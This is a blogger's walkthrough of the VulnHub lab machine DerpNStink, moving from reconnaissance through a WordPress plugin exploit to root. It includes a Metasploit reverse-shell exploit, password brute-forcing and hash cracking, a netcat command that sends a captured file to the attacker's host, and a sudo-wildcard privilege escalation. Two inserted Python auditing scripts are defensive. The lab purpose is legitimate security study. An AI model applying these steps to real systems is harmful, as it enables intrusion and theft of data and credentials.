So this is my first writeup on a VulnHub image and it is called DerpNStink: 1
I know that this is a really famous machine, so why should you bother with a writeup that is out there hundreds of times?
The reason is that I wanted to try it and see if my methodology and approach are similar to those of more experienced researchers. This is one of the first machines I tried.
Also this writeup is really verbose (-vV) because I am not only interested in the flags but also in the mindset that I have to acquire, so feel free to leave a comment if you believe I’m getting something wrong.
Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…
So as usual I fire up Kali Linux and the DeRPnStiNK on VirtualBox and start the very first scans for information gathering.
First things first I run netdiscover to find all the devices connected to my home network.
netdiscover -r 192.168.2.0/24
So derpnstink is running on 192.168.2.8!
Next I run nmap to find open ports and identify the services running on them.
nmap -sV -T4 -O -F --version-light 192.168.1.8
So 3 services running on ports 21,22 and 80.
Really common services (FTP,SSH and HTTP) with HTTP being the most interesting because it will probably host a web application.
FTP is using vsftpd on a slightly outdated version (Sep 2012 – vsftpd-3.0.2) where the latest version is (Jul 2015 – vsftpd-3.0.3).
Searchsploit returned a few exploits for vsftpd but for older versions (2.X.X)
So, nothing really fancy is going to happen here. Maybe we could try to brute-force the service but we will leave that for now as a worst case scenario.
I also tried to connect as anonymous user with the Metasploit auxiliary module with no luck (auxiliary/scanner/ftp/anonymous).
Now lets focus on the SSH service.
The version that is running (6.6.1p1) is not vulnerable to any public exploits.
Again nothing interesting here and we won’t try to bruteforce it (I hope so).
If we try to connect with SSH we get a Permission denied (publickey)
Moving to the most interesting part, the HTTP and port 80.
Lets start with Knockpy that is a python sub-domain scanner again based on a common sub-domain wordlist.
No luck here. No sub-domains exist.
Nikto will help us get a better idea about the web server and the web apps hosted.
nikto -h 192.168.2.8
Lets continue with Dirb, one of my favorite tools that scans for common sub-directories based on a wordlist.
(The -r parameter means to scan but not recursively because we don’t want to get lost and scan for hours each and every folder that might exist. For now we are only interested in level-0 folders)
dirb 192.168.1.8 -r
Really interesting stuff here.
Lets also run an auxiliary directory scanner from Metasploit that does the same job in case Dirb missed something.
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.8
run
Actually Dirb did a better job here because the auxiliary scanner missed a few files and directories.
So, lets finally open 192.168.1.8 on the web browser.
An image of Mr.Derp and Uncle Stinky. No login , nothing interesting other than the cool visuals.
Lets view the page's source
Opening http://192.168.2.8/webnotes/ gives us useful information about system users, web directories and a local domain.
Opening http://192.168.2.8/webnotes/info.txt is even more interesting as it gives us a hint!
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->
So we add to our /etc/hosts the following line
Scrolling further down to the source code of the home page we find our first flag!
Well that was easy. 4 to go.
http://192.168.2.8/robots.txt/ usually is really informative cause it is used to hide stuff from the Search Engines that actually care about robots.txt files.
Anyway, deadend. Both on /php/ and /temporary/
Browsing dirb results also is a dead end.
/weblog/ … on the other hand opens a new page!
It is clearly a WordPress blog. Interesting
http://derpnstink.local/weblog/wp-admin/ loads fine. That is convenient for us, not for derp though.
So it is time to use WPScan.
WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.
These are the options that we are currently interested in.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write  chars)
p plugins
vp only vulnerable plugins
ap all plugins (can take a long time)
tt timthumbs
t themes
vt only vulnerable themes
at all themes (can take a long time)
cb Config backups
dbe Database exports
Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
If no option is supplied, the default is "vt,tt,u,vp"
We will try to enumerate vulnerable plugins,themes, users, the viral timthumb vulnerability and also config backups and DB exports.
wpscan --url http://derpnstink.local/weblog -e vt,tt,u,vp,cb,dbe
WPScan returned some naaasty stuff about this WordPress installation
WordPress Security Scanner by the WPScan Team
Version 3.4.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
[+] URL: http://derpnstink.local/weblog/
[+] Started: Fri Jan 4 14:19:12 2019
Interesting Finding(s):
[+] http://derpnstink.local/weblog/
 | Interesting Entries:
 | - Server: Apache/2.4.7 (Ubuntu)
 | - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
[+] http://derpnstink.local/weblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 | - Link Tag (Passive Detection), 30% confidence
 | - Direct Access (Aggressive Detection), 100% confidence
 | References:
 | - http://codex.wordpress.org/XML-RPC_Pingback_API
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
[+] WordPress version 4.6.13 identified (Latest, released on 2018-12-13).
 | Detected By: Emoji Settings (Passive Detection)
 | - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.13'
 | Confirmed By: Meta Generator (Passive Detection)
 | - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.13'
[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2018-12-19T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 1.7
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.13
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Detected By: Style (Passive Detection)
 | - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.13, Match: 'Version: 1.3'
[+] Enumerating Vulnerable Plugins
[+] Checking Plugin Versions
[i] Plugin(s) Identified:
[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2018-11-15T11:14:00.000Z
 | [!] The version is out of date, the latest version is 1.6.9
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
 | Fixed in: 1.4.7
 | References:
 | - https://wpvulndb.com/vulnerabilities/7532
 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
 | - https://www.exploit-db.com/exploits/34681/
 | - https://www.exploit-db.com/exploits/34514/
 | - http://seclists.org/bugtraq/2014/Sep/1
 | - http://packetstormsecurity.com/files/131526/
 | - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
 |
 | [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
 | Fixed in: 126.96.36.199
 | References:
 | - https://wpvulndb.com/vulnerabilities/8263
 | - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
 | - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
 |
 | [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
 | Fixed in: 1.6.5
 | References:
 | - https://wpvulndb.com/vulnerabilities/8786
 | - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
 | - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
 |
 | [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
 | Fixed in: 1.6.6
 | References:
 | - https://wpvulndb.com/vulnerabilities/8795
 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946
 | - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
 | - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
 |
 | Version: 1.4.6 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
[+] Enumerating Vulnerable Themes
 Checking Known Locations - Time: 00:00:01 <=====================================================================> (288 / 288) 100.00% Time: 00:00:01
[+] Checking Theme Versions
[i] No themes Found.
[+] Enumerating Timthumbs
 Checking Known Locations - Time: 00:00:12 <===================================================================> (2573 / 2573) 100.00% Time: 00:00:12
[i] No Timthumbs Found.
[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:00 <========================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports
 Checking DB Exports - Time: 00:00:00 <============================================================================> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] unclestinky
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] Finished: Fri Jan 4 14:19:46 2019
[+] Requests Done: 2921
[+] Cached Requests: 55
[+] Data Sent: 670.18 KB
[+] Data Received: 1.375 MB
[+] Memory used: 83.152 MB
[+] Elapsed time: 00:00:34
PHP version seems outdated with a few interesting CVEs but for now lets focus on the WordPress stuff.
WordPress version is also outdated but nothing exploitable.
WPScan found 4 vulnerabilities in the slideshow-gallery plugin!
The first is Slideshow Gallery < 1.4.7 Arbitrary File Upload, which has a Metasploit module with an excellent rank. Awesome!!
The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it's possible to upload any file type.
The bad thing is that the exploit requires an authenticated user. Lets see if we can register a low privileged user.
http://derpnstink.local/weblog/wp-login.php?action=register
Anddd nop! Registration for users is disabled.
WPScan has already found users by the way (unclestinky,admin) so maybe we can try for common passwords on them.
So lets brute force them
But we need a wordlist.
Thankfully Kali has a few decent wordlists built-in on the following dir
I like rockyou.txt.gz
So lets unzip it
gunzip rockyou.txt.gz
wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/rockyou.txt --max-threads 25
Well I think maybe the rockyou.txt is an overkill
Even WPScan can’t calculate the needed time to exhaust the list.
Lets try a smaller one.
wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/fasttrack.txt
Aaaand success! That was crazy-easy. We could have found it even manually actually.
Lets login to WordPress with username: admin password: admin
Didn’t find anything useful other than the vulnerable plugin, and many options on the WordPress menu were hidden even if we were connected as an administrator. Trying to view other pages like wp-admin/options-general.php returns an error “Sorry, you are not allowed to access this page.” Something is wrong here.
WPScan found another user “unclestinky” but didn’t crack the password.
Lets login to WordPress with username: unclestinky password: unclestinky
Lets use the admin user for the metasploit exploit.
set RHOST 192.168.2.8
use exploit/unix/webapp/wp_slideshowgallery_upload
set TARGETURI /weblog
set WP_USER admin
set WP_PASSWORD admin
check
192.168.2.8:80 – The target appears to be vulnerable.
msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
[*] Started reverse TCP handler on 192.168.2.9:4444
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file xtgeaywf.php
[*] Sending stage (38247 bytes) to 192.168.2.8
[*] Meterpreter session 2 opened (192.168.2.9:4444 -> 192.168.2.8:48812) at 2019-01-05 13:55:17 -0500
[+] Deleted xtgeaywf.php
So we got a meterpreter shell pretty easy as user www-data.
meterpreter > sysinfo
Computer : DeRPnStiNK
OS : Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686
Meterpreter : php/linux
Viewing the current directory files with ls returns a strange file named elidumfy.php that contains a payload from another user that tried to hack derpnstinky! lol
meterpreter > ls
Listing: /var/www/html/weblog/wp-content/uploads/slideshow-gallery
==================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2017-11-12 22:43:29 -0500 cache
100644/rw-r--r-- 108987 fil 2017-11-12 22:45:12 -0500 derp.png
100644/rw-r--r-- 1114 fil 2017-12-12 16:44:11 -0500 elidumfy.php
We continue to browse the directories with meterpreter.
Editing wp-config.php provides us valuable information to connect to the database.
Outside the /weblog directory we will try to visit the directories that we found at the beginning with dirb that returned error 403.
Editing info.php on /var/www/html/php returns interesting stuff
meterpreter > ls
Listing: /var/www/html/php
==========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 72 fil 2018-01-09 12:33:24 -0500 info.php
We could do some nasty stuff with meterpreter but for now lets focus on phpMyAdmin.
After successful login with username: root password: mysql we can view all the databases.
Searching on table information_schema the string “flag” returned an interesting result in the wordpress database.
Searching again with “flag” returned us the 2nd flag of the machine in the wp_posts table.
2 to go
Lets view the registered users in wp_users table.
It would be nice if we could login as “unclestinky” to WordPress but as far as I know cracking a WordPress salted password won’t be that easy, so why not just replace the hash with that of the “admin” user, whose password we already know is “admin”. Before we do that lets keep a backup of the salted hash in case we need it later.
And now we can easily login with username: unclestinky password: admin
Nothing interesting though.
Back to meterpreter shell and browsing the filesystem
returns mrderp, stinky with bin/bash access
Continuing to /home directories /home/stinky and /home/derp and trying to view them unfortunately returns permission error as we are using the shell as user www-data.
At that point I must admit that I was kinda lost.
I am still really novice at this and especially on linux file system and where to look for interesting things or flags.
I have still 2 flags to go and I am sure the /home directory is full of secrets.
So port 21, 22, 80. I had some fun with port 80 but 21 and 22 are still really quiet.
usernames found: admin, mrderp, stinky
Tried manually to login with SSH but password logins are disabled. Also tried guessing FTP passwords with no luck.
Lost valuable time.
It is time to bruteforce the salted hash of wordpress user unclestinky and hope that he uses the same password on ssh or ftp.
john --wordlist=/usr/share/wordlists/rockyou.txt unclestinky_wp_hash.txt
And we finally have the password! wedgie57
Username on WordPress was “unclestinky” but we know from previous information gathering (http://192.168.2.8/webnotes/) that on the Linux system it is “stinky”
And we have successfully connected with ftp as “stinky”
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 Nov 12 2017 network-logs
drwxr-xr-x 3 1001 1001 4096 Nov 12 2017 ssh
-rwxr-xr-x 1 0 0 17 Nov 12 2017 test.txt
drwxr-xr-x 2 0 0 4096 Nov 12 2017 tmp
226 Directory send OK.
Switching to browser for better browsing.
In the file ftp://192.168.2.8/files/network-logs/derpissues.txt there are a few chatlogs from stinky and derp.
“12:07 stinky: im gonna packet capture so we can figure out whats going on”
Stinky mentions a packet capture file so we might need to keep that info in mind as a hint.
We will probably have to analyze a .pcap file.
Not so well hidden in the following directory, luckily for us we found a private RSA key.
We create a file with the RSA key on the following directory ~/.ssh/id_rsa and then we try to login.
ssh -i key.txt firstname.lastname@example.org
chmod 700 key.txt
And we are in as email@example.com
We browse the directories
And we got the 3rd flag!
Also in Documents folder a derpissues.pcap is waiting to be wiresharked!
I didn’t know how to get it to my local machine. I tried to move it to the /var/www dir to download it but I didn’t have the right permissions.
So after googling I found a solution using netcat.
We listen to port 31337 on kali for the file derpissues.pcap
nc -l -p 31337 > derpissues.pcap
And we send it as a gift from derp
nc 192.168.2.9 31337 < derpissues.pcap
We are probably interested in http post requests on wp-login.php so we filter the results accordingly.
Luckily for us the site is not using SSL so passwords are sent in plain text.
No luck on that post request though because we already know that password.
And we got the password for derp!
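The same check as a script, from the point of view of someone auditing their own captures for logins that cross the wire unencrypted. This is an added example, not part of the original writeup: it reads a classic pcap with the standard library only, reports form logins sent over plain HTTP and masks the password. The capture is constructed inline, the credentials in it are made up, and requests split across several TCP segments are not reassembled.

```python
import struct
from urllib.parse import parse_qs

SECRET_FIELDS = {"pwd", "pass", "passwd", "password"}  # assumed common form field names


def tcp_payloads(pcap: bytes):
    """Yield the TCP payload of every Ethernet/IPv4/TCP packet in a classic pcap file."""
    if pcap[:4] == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif pcap[:4] == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled)")
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet (linktype 1) captures are handled")
    pos = 24  # first record follows the 24-byte global header
    while pos + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "I", pcap[pos + 8:pos + 12])[0]
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < 54 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # too short, not IPv4, or not TCP
        ip_hdr = (frame[14] & 0x0F) * 4
        ip_total = struct.unpack("!H", frame[16:18])[0]
        tcp = frame[14 + ip_hdr:14 + ip_total]
        if len(tcp) >= 20:
            yield tcp[(tcp[12] >> 4) * 4:]  # skip the TCP header (data offset)


def cleartext_logins(pcap: bytes):
    """Return (path, username, masked_password) for form logins sent over plain HTTP."""
    hits = []
    for data in tcp_payloads(pcap):
        head, sep, body = data.partition(b"\r\n\r\n")
        if not sep or not head.startswith(b"POST "):
            continue
        path = head.split(b" ", 2)[1].decode("latin-1")
        fields = parse_qs(body.decode("latin-1"))
        user = (fields.get("log") or fields.get("username") or ["?"])[0]
        for name in sorted(fields.keys() & SECRET_FIELDS):
            hits.append((path, user, "*" * len(fields[name][0])))
    return hits


def build_sample_pcap() -> bytes:
    """Constructed capture: one packet carrying a WordPress login POST (made-up credentials)."""
    body = b"log=exampleuser&pwd=example-pass&wp-submit=Log+In"
    http = (b"POST /weblog/wp-login.php HTTP/1.1\r\nHost: derpnstink.local\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + http
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes([192, 168, 2, 9]), bytes([192, 168, 2, 8]))
    frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    record_hdr = struct.pack("<IIII", 0, 0, len(frame), len(frame))
    return global_hdr + record_hdr + frame


if __name__ == "__main__":
    for path, user, masked in cleartext_logins(build_sample_pcap()):
        print(f"cleartext login to {path}: user={user} password={masked}")
```

Any hit means the login form is served without TLS; the fix is on the web server, not in the capture.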
And we are in!
Browsing the directories for flag4.
The file /home/mrderp/Desktop/helpdesk.log contains a support ticket that contains too much text and a pastebin link: https://pastebin.com/RzK9WfGw
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
So I had to google ALOT to find out what that means.
Long story short, mrderp can run through sudo, as any user including root, every file in /home/mrderp/binaries/ with a name derpyXXX.XXX, so it will run with full privileges.
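Why this rule is dangerous, as an added example that is not part of the original writeup: a small static audit that flags sudoers commands living in a directory the invoking user controls, which is exactly the situation above. Line 5 of the sample is the rule quoted in this writeup, the other lines are constructed, and the check assumes home directories live under /home and does not resolve aliases or real file permissions.

```python
import re
from dataclasses import dataclass

# Directories every local user can write to (assumed list; extend for your hosts).
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# user-or-%group  host = (runas) command-list
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...

SAMPLE_SUDOERS = """\
# line 5 is the rule from the writeup; everything else is constructed
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
backup ALL=(root) NOPASSWD: /usr/bin/rsync, /tmp/sync-*.sh
alice ALL=(root) /usr/sbin/tcpdump
"""


@dataclass(frozen=True)
class Finding:
    line_no: int
    who: str
    path: str
    wildcard: bool
    reason: str


def audit_sudoers(text, home_root="/home"):
    """Flag sudoers commands located where an unprivileged user can create files."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if (not line or line[0] in "#@" or line.startswith("Defaults")
                or "_Alias" in line.split()[0]):
            continue  # comments, includes, defaults and alias definitions
        m = RULE.match(line)
        if not m:
            continue
        who = m["who"]
        for cmd in m["cmds"].split(","):
            cmd = TAGS.sub("", cmd.strip())
            path = cmd.split()[0] if cmd else ""
            if not path.startswith("/"):
                continue  # ALL and alias names are out of scope here
            if not who.startswith("%") and path.startswith(f"{home_root}/{who}/"):
                reason = "inside the invoking user's own home directory"
            elif path.startswith(WORLD_WRITABLE):
                reason = "inside a world-writable directory"
            else:
                continue
            # A wildcard in the file name accepts any matching file dropped there.
            wildcard = any(c in path.rsplit("/", 1)[1] for c in "*?[")
            findings.append(Finding(line_no, who, path, wildcard, reason))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f.line_no}: {f.who} -> {f.path} ({f.reason}, wildcard={f.wildcard})")
```

A safer rule names one fixed, root-owned binary in a root-owned directory, with no wildcard.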
Lets create a bash shell as derpysfuckingawesomebashshell.sh
mkdir binaries
nano derpysfuckingawesomebashshell.sh
#!/bin/bash
bash -i
And we are root!
Last flag was on /root/Desktop/flag.txt
mrDerp and UncleStinky got rooted
Don’t forget to change /var/www/html/temporary/index.html from “try harder!” to “I tried harder!!!”
So this was really fun and I learned a lot of new things.
Multiple vulnerabilities were found and were exploited in order to finally gain root access.
I must say that although it was kinda challenging for me, this situation is far away from any real world scenario. Still good practice to sharpen my skills and I hope that I can deal with more advanced machines in the near future.